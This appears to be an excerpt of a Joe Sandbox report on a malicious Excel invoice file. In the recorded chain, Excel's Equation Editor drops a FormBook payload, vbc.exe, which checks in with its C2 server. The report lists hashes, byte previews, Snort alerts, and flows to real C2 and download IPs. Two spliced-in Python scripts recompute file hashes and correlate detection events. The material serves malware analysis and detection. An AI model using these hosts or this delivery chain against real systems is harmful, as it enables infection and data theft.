                                                      Preview:.....F.>...u........R........................u.F.............................-...................".....-...........................".....-....................-...........F...$.!.....!...*...2...9...?...C...F...G...F...C...?...9...2...*...!.........................................................................................-...............-.......-....................-...............$...[...6._...x.[.......-...............-.......-....................-...............$...o.D...x.#.w...G.o.D.....-...............-.......-....................-...............$.........!.V.{...y.............-...............-.......-....................-...............$.....M.w...n.@.[.....M.....-...............-.......-....................-...............$.......f...Q...........-...............-.......-....................-...............$...'.U.....K...'.U.....-...............-.......-....................-...............$.c...u...\...D...,.........j...S...=...%.........x...c...N...:...&.v...p...
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                      Category:dropped
                                                      Size (bytes):223752
                                                      Entropy (8bit):3.2805343869701504
                                                      Encrypted:false
                                                      SSDEEP:1536:gAGsM8yOYZWQ99d99H9999999lN6Hz8iiiiiiiiiiiiiiiPnHnbq+QVwtaKfdL4a:gMMVNSztnZft6rMMVNSztnZft6u
                                                      MD5:8E3A74F7AA420B02D34C69E625969C0A
                                                      SHA1:4743F57F0F702C5B47FA1668D9173E08ADA16448
                                                      SHA-256:0CD83C55739629F98FE6AFD3E25A5BCBB346CBEF58BC592C1260E9F0FA8575A9
                                                      SHA-512:ADE6B91E260AFA08CC286471D0AD7BCA82FF5E1FE506D48B37A13E3CDD2717171CDAC38C77CFF18FD4C26CA9470B002B63B7FDDC0466FC6F7010A772BF557054
                                                      Malicious:false
                                                      Preview:....l................................... EMF.....j..........................8...X....................?......F...........GDIC...............p.........8.........................F...........................A. ...........F.......(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:ms-windows metafont .wmf
                                                      Category:dropped
                                                      Size (bytes):1970
                                                      Entropy (8bit):5.125773446782967
                                                      Encrypted:false
                                                      SSDEEP:48:KxK48S3oEL48I+KL48uL48kL48tnL48I0L48Ih2L48Ls4fnPK6L48tOL48bCb3RM:KxKS3okSuEtN1O2FfUcM
                                                      MD5:30935B0D56A69E2E57355F8033ADF98B
                                                      SHA1:5F7C13E36023A1B3B3DAF030291C02631347C2AB
                                                      SHA-256:077232D301E2DF2E2702BD9E7323806AC20134F989C8A4102403ECBF5E91485E
                                                      SHA-512:5D633D1EC5559443D3DA5FAD2C0CFC5DBF6A006EF6FBEE8C47595A916A899FBDF713897289E99EE62C07B52CCB61578253791AC57712DF040469F21287A742E9
                                                      Malicious:false
                                                      Preview:.....F.>...u........R........................u.F.............................-...................".....-...........................".....-....................-...........F...$.!.....!...*...2...9...?...C...F...G...F...C...?...9...2...*...!.........................................................................................-...............-.......-....................-...............$...[...6._...x.[.......-...............-.......-....................-...............$...o.D...x.#.w...G.o.D.....-...............-.......-....................-...............$.........!.V.{...y.............-...............-.......-....................-...............$.....M.w...n.@.[.....M.....-...............-.......-....................-...............$.......f...Q...........-...............-.......-....................-...............$...'.U.....K...'.U.....-...............-.......-....................-...............$.c...u...\...D...,.........j...S...=...%.........x...c...N...:...&.v...p...
                                                      Process:C:\Users\Public\vbc.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):5255
                                                      Entropy (8bit):6.127070531933686
                                                      Encrypted:false
                                                      SSDEEP:96:PtzobClet8oviJxTEJ7eusJIzyy+F4q0IqxeEoAe8oUEVsLA3wtPAJmr2DmX:JEueZvMly+iIqxeocsLA3wtPAJmr2DmX
                                                      MD5:D4AA661B180DF0D15BB6D0DC8342B8BA
                                                      SHA1:07310F7D0C29CD6A18AE1174578F61B08E2BA844
                                                      SHA-256:E12B146FD62913D6650FCAF490CF973008929E47FD247CB3BD75B6E854CFDD89
                                                      SHA-512:B423C31088CE987D77CCB2ECFB055674868DD34A995CCA1C5AFFF3CA6F2BFEA0C64037D68132C43735140651CD550507773012C23F142F04B3DE984FD4DAB39A
                                                      Malicious:false
                                                      Preview:....L..b..RKNb|..N%{..\.N%{..\.b|...\....b|...l..l..\.U......\..L..l..l..\.U......\..L..l..l..\.U......\..L..l..l..\.U.)....\%.L!bd..k.w.Mz%..\...\..L..\.b....\..T..\..T... ..w.H...\..L.....\.NK.|.b..w......b..|..l.H.l.G.l.M.l%.H.l.F.l.C..q.~]...~].Y.b..l..l.G.\....\..|............b...|.CF.\.FCJ....L..PP.N%{..\..\...\.r..\....T... .. ..L..\..\....T....\..L.....}...f.o....}......}{..f.E....K......}.I.f.S...........L..b...N%{..\..\.....\..\.bd..q..\.....\..\..\.].\....]....%q[.\..w.Hz.......Q...\..w.H .......Q..w.w.Mz%.....U}{..f.....U......\....\.U.l..W....\.bd..q.b|.....\......\.....L..b...N%{..\..\.....\%.\.bd..q..\.....\..\..\.].\.........%.a.....\..w.Hz.....%.Q.!.\..w.H .....%.Q.!.\..w.H.....%.Q.!.\...w.Gz.....%.Y.!.\..w.H .....%.Q.!w.w.Mz%....%U}...f.....U......\.bd..q..\..T......l..l..l..l..l.......\.bd..q.b|.....\......\.....L..b...\.....\..\.bd..q..\.....\..\..\.].\.........%q[.\..w.Hz.......Q...\..w.H .......Q..w.w.Mz%.....U}.I.f.....U......\....l..l.....
                                                      Process:C:\Users\Public\vbc.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):175103
                                                      Entropy (8bit):7.987300968800779
                                                      Encrypted:false
                                                      SSDEEP:3072:Bj4fQd5wKwOPNwZmWzhCm2iGEOkdF3dpLvhYMDyYKGNqyoryYuhnMW2LkMVmHz8C:RngJOPNKm6hVGEXdFjLBlNqyF3hGVmTP
                                                      MD5:0B70240F412D375469A67F4E364E6EDD
                                                      SHA1:877D66CBFFF0712D91ED65C7545577729B34CB1A
                                                      SHA-256:DAAE8081EFFED8BB74D40479D2264D791A8539F1ED8565438640EE6681D5DC64
                                                      SHA-512:C6980E41D2EA0D85D5A586A32EC6142B301B7E03AC1871587BE5AC00FCA6CEA1680D62262A8656F1B1A4B428567B6BAEE0C05A35C07C8B9EA09594CB067B64C5
                                                      Malicious:false
                                                      Preview:^......&..(3x..^.....\5...x...{......e.d..y.q......2A.m..~..v.......R.v...f.....[..f...~o....)e.).X......w.....5...z.....E...........\.f_.=f..BYbIv.......M...a.J.Q..Ox..C.![~........o.J..4O.epp!.k.k..%B........alu.Q...w3.....pF-}..=..5........&.].x.*k~.'.....v....^p.{......e.d..y.q......2A.m..F~...uo..e.E.....e..zk>..pp(........uk.m..z.......+Pg....z.....d.Quw.....%......`.-.K[....1..Q....$E.tfp..q_-....C.]eE..m.>o.o.J..4O.eBR-"+.7Jk|B.......W.@lu.Q..v@3..|...pF[}.d=..5....f....&..Mx..k~.'....4A....^..{......e.d..y.q......2A.m..F~...uo..e.E.....e..zk>..pp(........uk.m..z.......+Pg....z.....d.Quw.....%......`.-.K[....1..Q....$E.tfp..q.Ox..C.X~....f..o.J..4O.eBR-"+.kJk%B.......W.@lu.Q..v@3..|...pF[}.d=..5....f....&..Mx..k~.'....4A....^..{......e.d..y.q......2A.m..F~...uo..e.E.....e..zk>..pp(........uk.m..z.......+Pg....z.....d.Quw.....%......`.-.K[....1..Q....$E.tfp..q.Ox..C.X~....f..o.J..4O.eBR-"+.kJk%B.......W.@lu.Q.
                                                      Process:C:\Users\Public\vbc.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):277368
                                                      Entropy (8bit):7.483346602419937
                                                      Encrypted:false
                                                      SSDEEP:6144:kngJOPNKm6hVGEXdFjLBlNqyF3hGVmTb+ecu:kngJOPjcVZBbF8/eB
                                                      MD5:C2F526011A8F4C1202583C0F68C272D7
                                                      SHA1:6E43958FE2A7B13C248C45369E6B4113185A1B78
                                                      SHA-256:E3AA52846C6BC0E920C12B442E4E08EDE1D409D0A99069A19BB801162204A38B
                                                      SHA-512:A1301004F25C78C69FA4BEE2261D2ABDEEAEFAA843EE27841EC41773B3C16597C58E066CDDF4C5F79FBBC964AC0164C77221E954D5FC168EC231C2366FEAEC07
                                                      Malicious:false
                                                      Preview:.@......,................"......$1.......@.......@..........................................................................................................................................................................................................................................G...............a...j...............................................................................................................................U.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\Public\vbc.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):80384
                                                      Entropy (8bit):6.294551753702395
                                                      Encrypted:false
                                                      SSDEEP:1536:fGTaC+v1UYfr0oxAomP3cX/4pi2sWjcdl5I:Ua5eYD1/ui5lC
                                                      MD5:BC3C746DB1D3F8A821BBDF17CA023450
                                                      SHA1:12459C0EF96BDE1490B00FC9C6F09D69FBEC046F
                                                      SHA-256:C503A6FBE974E2C177FAFFFC2F2D9F7C26473909A2AB054E305B0E231C54B785
                                                      SHA-512:92A0EBED569EDE2306B15D12389110016FC45073BECA5BD3FF813BEDA7988A042D1827DDF8B985112C3D606AF378DEA952962CB601A85E0EAFA7D696EACCECF3
                                                      Malicious:true
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........w...w...w...%`..w...%^..w...%a.w......w...w..w..p....w..p.~..w..p....w..Rich.w..................PE..L...z&~b............................7.............@.......................................@..................................$.......p..................................T...............................@............................................text...U........................... ..`.rdata...N.......P..................@..@.data... 1...0......................@....rsrc........p.......*..............@..@.reloc...............,..............@..B................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:CDFV2 Encrypted
                                                      Category:dropped
                                                      Size (bytes):95744
                                                      Entropy (8bit):7.922070010958603
                                                      Encrypted:false
                                                      SSDEEP:1536:jh2xAtm2bfGDEZDovjNYbzrPyBSSRXSRR411fQGOadB0Lp1j4JjFSOEt8pRRZz:jh2PvWeYmBr4O1ppOIBMsJttzRZz
                                                      MD5:5B4A67AC532A5D8900B815144F0FB845
                                                      SHA1:6DA306004E084780E9F57F3702A5EC22E72FFF6C
                                                      SHA-256:98FC7157DAFDE651C3AB515663E3A91F034B49175E2E2495C00576C4B8E9E96D
                                                      SHA-512:031659B74D92911A76865B5095E75521E69E322838E8636E66E9E365B5BC5AC270F61B3C4B8831DD7D3E16A7318D4B5B3E4379AE6487E81F1FAA8BD9B988164D
                                                      Malicious:false
                                                      Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):512
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3::
                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                      Malicious:false
                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):512
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3::
                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                      Malicious:false
                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):512
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3::
                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                      Malicious:false
                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):165
                                                      Entropy (8bit):1.4377382811115937
                                                      Encrypted:false
                                                      SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                      MD5:797869BB881CFBCDAC2064F92B26E46F
                                                      SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                      SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                      SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                      Malicious:true
                                                      Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                      Category:dropped
                                                      Size (bytes):263772
                                                      Entropy (8bit):7.907718436240332
                                                      Encrypted:false
                                                      SSDEEP:6144:LOtIO4ysWjl1zKay/DGHe9G78x3c4mfnk1OUgS:LOLSepKvCH78xM4mQOY
                                                      MD5:DE76EF6A11A63EFC00B0303888BC0B7F
                                                      SHA1:7AB24456A49F6B61BC54D20A4D9C0B84F3AE696B
                                                      SHA-256:FC6EBE8BC215A292BB3DF340A84350CEB2BE7187EFC8E10381235CFA8D82F734
                                                      SHA-512:51A5CF0F640D922EC0D8BF5BA3FCC06B6278E3AC45F07190710C5055A23102A614443641D8B6617775D5A786CCB1E9D10404DFA0E146E6C8EC3481C616214D99
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 51%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....Oa.................h....:.....F6............@...........................;...........@...........................................;.P............................................................................................................text....g.......h.................. ..`.rdata...............l..............@..@.data.....9.........................@....ndata........:..........................rsrc...P.....;.....................@..@................................................................................................................................................................................................................................................................................................................................................
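The per-file fields above (size, 8-bit entropy, MD5/SHA1/SHA-256/SHA-512, file type) are what an analyst re-derives when verifying a report against a local copy of an artifact, or when triaging new drops that Joe Sandbox has not seen. The script below is an added example, not code from Joe Sandbox or from this report: it recomputes those fields with the Python standard library. The input buffers are constructed here; the only known answer taken from the page is the 512-byte all-zero "data" file, whose hashes the check reproduces. The SSDEEP column is omitted (it needs the non-standard ssdeep library) and the report's "Encrypted" flag is Joe Sandbox's own heuristic and is not reproduced; the magic-byte mapping in `file_type` is an assumed subset of what libmagic does.

```python
"""Recompute the dropped-file fields shown in a Joe Sandbox report:
size, 8-bit Shannon entropy, hashes and a coarse file type from magic bytes.

Added example, not part of the Joe Sandbox report or its code. Inputs are
constructed below; ZERO_SECTOR matches the report's 512-byte all-zero entries.
"""
import hashlib
import math
from collections import Counter


def shannon_entropy_8bit(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for a constant buffer, 8.0 for uniform bytes."""
    entropy = 0.0
    n = len(data)
    for count in Counter(data).values():
        p = count / n
        entropy -= p * math.log2(p)
    return entropy


def file_type(data: bytes) -> str:
    """Coarse classification from the signatures seen in this report's entries.
    Assumed mapping for the example; libmagic's database is far more complete."""
    if data[:2] == b"MZ" and len(data) >= 0x40:
        e_lfanew = int.from_bytes(data[0x3C:0x40], "little")      # offset of "PE\0\0"
        if data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00":
            # Optional header magic sits 24 bytes past the PE signature.
            magic = int.from_bytes(data[e_lfanew + 24:e_lfanew + 26], "little")
            return {0x10B: "PE32 executable", 0x20B: "PE32+ executable"}.get(magic, "PE executable")
        return "MS-DOS executable"
    if data[:8] == b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1":
        return "CDFV2 / OLE2 compound file"
    if data[40:44] == b" EMF":                 # EMF signature at offset 40 of the header
        return "Windows Enhanced Metafile"
    if data[:4] == b"\xd7\xcd\xc6\x9a":        # placeable WMF header
        return "ms-windows metafont .wmf"
    return "data"


def describe(data: bytes) -> dict:
    """Same fields as one dropped-file entry in the report, recomputed locally."""
    return {
        "File Type": file_type(data),
        "Size (bytes)": len(data),
        "Entropy (8bit)": shannon_entropy_8bit(data),
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


# Constructed inputs (not files extracted from the report).
ZERO_SECTOR = bytes(512)

_pe = bytearray(0x100)
_pe[0:2] = b"MZ"
_pe[0x3C:0x40] = (0x80).to_bytes(4, "little")    # e_lfanew: PE header at 0x80
_pe[0x80:0x84] = b"PE\x00\x00"
_pe[0x98:0x9A] = (0x10B).to_bytes(2, "little")   # optional header magic: PE32
FAKE_PE = bytes(_pe)

OLE2_STUB = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + bytes(504)


def main():
    for name, blob in (("zero sector", ZERO_SECTOR), ("fake PE", FAKE_PE), ("OLE2 stub", OLE2_STUB)):
        print(f"--- {name}")
        for field, value in describe(blob).items():
            print(f"{field}: {value}")


if __name__ == "__main__":
    main()
```

Run against a real drop, `describe(open(path, "rb").read())` gives the same hash columns as the report, so a mismatch on MD5 or SHA-256 means you are not holding the file the sandbox saw. The entropy column is the quickest triage signal in the list above: the all-zero stubs sit at 0.0, plain PE files in the 6 range, and the two large vbc.exe drops at 7.5 to 7.99, which is what packed or encrypted payload blobs look like.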
                                                      File type:CDFV2 Encrypted
                                                      Entropy (8bit):7.922070010958603
                                                      TrID:
                                                      • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                      File name:DL03327INV.xlsx
                                                      File size:95744
                                                      MD5:5b4a67ac532a5d8900b815144f0fb845
                                                      SHA1:6da306004e084780e9f57f3702a5ec22e72fff6c
                                                      SHA256:98fc7157dafde651c3ab515663e3a91f034b49175e2e2495c00576c4b8e9e96d
                                                      SHA512:031659b74d92911a76865b5095e75521e69e322838e8636e66e9e365b5bc5ac270f61b3c4b8831dd7d3e16a7318d4b5b3e4379ae6487e81f1faa8bd9b988164d
                                                      SSDEEP:1536:jh2xAtm2bfGDEZDovjNYbzrPyBSSRXSRR411fQGOadB0Lp1j4JjFSOEt8pRRZz:jh2PvWeYmBr4O1ppOIBMsJttzRZz
                                                      TLSH:EB93F1C9C16498FDF4FEF67928986921F4686DF7D54497E0A226B00EC738A642BA0D31
                                                      File Content Preview:........................>......................................................................................................................................................................................................................................
                                                      Icon Hash:e4e2aa8aa4b4bcb4
Timestamp                 Protocol  SID      Message                               Source Port  Dest Port  Source IP     Dest IP
05/14/22-15:20:54.628198  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49175        80         192.168.2.22  198.54.117.212
05/14/22-15:20:54.628198  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49175        80         192.168.2.22  198.54.117.212
05/14/22-15:20:54.628198  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49175        80         192.168.2.22  198.54.117.212
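The Snort hits above are a network-side view of the last step of the chain; the dropped-file list earlier in the report is the host-side view of the first steps (Excel starts EQNEDT32.EXE, EQNEDT32.EXE writes a PE and connects out, the PE runs). A detection engineer wants those views tied together in one rule set. The script below is an added example, not Joe Sandbox's detection code and not part of this report: the rule names follow the report's signature names, but the logic is a hypothetical re-implementation over Sysmon-style process-create, file-create and network-connect events. The image paths and IP addresses in the sample events are taken from the report; the event sequence itself, the benign control event and the `Event` schema are constructed for the example.

```python
"""Correlate process, file and network telemetry for the Equation Editor chain
(EXCEL.EXE -> EQNEDT32.EXE -> dropped PE -> outbound connections).

Added example, not Joe Sandbox's detection code. Rule names mirror the report's
signature names; the matching logic and the event records are constructed here.
"""
from dataclasses import dataclass

EQNEDT = "eqnedt32.exe"
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}


@dataclass
class Event:
    kind: str                 # "process_create" | "file_create" | "network_connect"
    image: str                # acting process (Sysmon Image)
    parent_image: str = ""    # process_create only (Sysmon ParentImage)
    target: str = ""          # created file path, or "ip:port" for a connection
    data_head: bytes = b""    # first bytes of a created file, when the sensor captures them


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, detail) tuples in event order. State is kept across events so that
    a connection from a PE that EQNEDT32.EXE wrote earlier is tied back to the drop."""
    alerts = []
    dropped_pe = set()
    for ev in events:
        img = basename(ev.image)
        parent = basename(ev.parent_image) if ev.parent_image else ""
        if ev.kind == "process_create":
            if img == EQNEDT and parent in OFFICE_APPS:
                alerts.append(("Office application starts equation editor", ev.image))
            elif parent == EQNEDT:
                alerts.append(("Office equation editor starts processes", ev.image))
        elif ev.kind == "file_create" and img == EQNEDT:
            if ev.data_head[:2] == b"MZ":
                dropped_pe.add(ev.target.lower())
                alerts.append(("Office equation editor drops PE file", ev.target))
            else:
                alerts.append(("File dropped by EQNEDT32.EXE", ev.target))
        elif ev.kind == "network_connect":
            if img == EQNEDT:
                alerts.append(("Office equation editor establishes network connection", ev.target))
            elif ev.image.lower() in dropped_pe:
                alerts.append(("PE dropped by equation editor connects out",
                               f"{ev.image} -> {ev.target}"))
    return alerts


EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
EQNEDT_PATH = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
VBC = r"C:\Users\Public\vbc.exe"

# Constructed event sequence mirroring the chain in the report (the first event is a
# benign control: Excel writing a non-PE file must not fire anything).
SAMPLE_EVENTS = [
    Event("file_create", EXCEL, target=r"C:\Users\Public\notes.txt", data_head=b"hello"),
    Event("process_create", EQNEDT_PATH, parent_image=EXCEL),
    Event("file_create", EQNEDT_PATH, target=VBC, data_head=b"MZ\x90\x00"),
    Event("network_connect", EQNEDT_PATH, target="104.168.33.31:80"),
    Event("process_create", VBC, parent_image=EQNEDT_PATH),
    Event("network_connect", VBC, target="198.54.117.212:80"),
]


def run_sample():
    return detect(SAMPLE_EVENTS)


if __name__ == "__main__":
    for rule, detail in run_sample():
        print(f"[{rule}] {detail}")
```

Two caveats a practitioner should keep in mind. First, any process creation or network connection by EQNEDT32.EXE is worth alerting on by itself: the equation editor has no legitimate reason to do either, which is why the two EQNEDT32 rules need no further context. Second, the last rule depends on the payload connecting out under its own image; the report notes that this sample moves into another process by hollowing, after which host-side attribution to vbc.exe is lost, and it is the network-side Snort signatures above that catch the C2 check-in.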
Timestamp                             Source Port  Dest Port  Source IP      Dest IP
May 14, 2022 15:19:31.412448883 CEST  49173        80         192.168.2.22   104.168.33.31
May 14, 2022 15:19:31.526196957 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.526408911 CEST  49173        80         192.168.2.22   104.168.33.31
May 14, 2022 15:19:31.529700994 CEST  49173        80         192.168.2.22   104.168.33.31
May 14, 2022 15:19:31.645406961 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.645431042 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.645451069 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.645468950 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.645490885 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.645509005 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.645526886 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.645544052 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.645562887 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.645581961 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.645762920 CEST  49173        80         192.168.2.22   104.168.33.31
May 14, 2022 15:19:31.691004992 CEST  49173        80         192.168.2.22   104.168.33.31
May 14, 2022 15:19:31.759368896 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.759432077 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.759473085 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.759514093 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.759553909 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.759602070 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.759602070 CEST  49173        80         192.168.2.22   104.168.33.31
May 14, 2022 15:19:31.759644032 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.759649038 CEST  49173        80         192.168.2.22   104.168.33.31
May 14, 2022 15:19:31.759686947 CEST  49173        80         192.168.2.22   104.168.33.31
May 14, 2022 15:19:31.759687901 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.759691954 CEST  49173        80         192.168.2.22   104.168.33.31
May 14, 2022 15:19:31.759723902 CEST  49173        80         192.168.2.22   104.168.33.31
May 14, 2022 15:19:31.759732008 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.759738922 CEST  49173        80         192.168.2.22   104.168.33.31
May 14, 2022 15:19:31.759773016 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.759790897 CEST  49173        80         192.168.2.22   104.168.33.31
May 14, 2022 15:19:31.759814024 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.759816885 CEST  49173        80         192.168.2.22   104.168.33.31
May 14, 2022 15:19:31.759855986 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.759860992 CEST  49173        80         192.168.2.22   104.168.33.31
May 14, 2022 15:19:31.759896040 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.759898901 CEST  49173        80         192.168.2.22   104.168.33.31
May 14, 2022 15:19:31.759937048 CEST  49173        80         192.168.2.22   104.168.33.31
May 14, 2022 15:19:31.759938002 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.759978056 CEST  49173        80         192.168.2.22   104.168.33.31
May 14, 2022 15:19:31.766613007 CEST  49173        80         192.168.2.22   104.168.33.31
May 14, 2022 15:19:31.873425007 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.873451948 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.873512030 CEST  49173        80         192.168.2.22   104.168.33.31
May 14, 2022 15:19:31.873588085 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.873610973 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.873621941 CEST  49173        80         192.168.2.22   104.168.33.31
May 14, 2022 15:19:31.873632908 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.873634100 CEST  49173        80         192.168.2.22   104.168.33.31
May 14, 2022 15:19:31.873650074 CEST  49173        80         192.168.2.22   104.168.33.31
May 14, 2022 15:19:31.873656034 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.873668909 CEST  49173        80         192.168.2.22   104.168.33.31
May 14, 2022 15:19:31.873677969 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.873693943 CEST  49173        80         192.168.2.22   104.168.33.31
May 14, 2022 15:19:31.873702049 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.873716116 CEST  49173        80         192.168.2.22   104.168.33.31
May 14, 2022 15:19:31.873723984 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.873735905 CEST  49173        80         192.168.2.22   104.168.33.31
May 14, 2022 15:19:31.873745918 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.873765945 CEST  49173        80         192.168.2.22   104.168.33.31
May 14, 2022 15:19:31.873766899 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.873786926 CEST  49173        80         192.168.2.22   104.168.33.31
May 14, 2022 15:19:31.873792887 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.873807907 CEST  49173        80         192.168.2.22   104.168.33.31
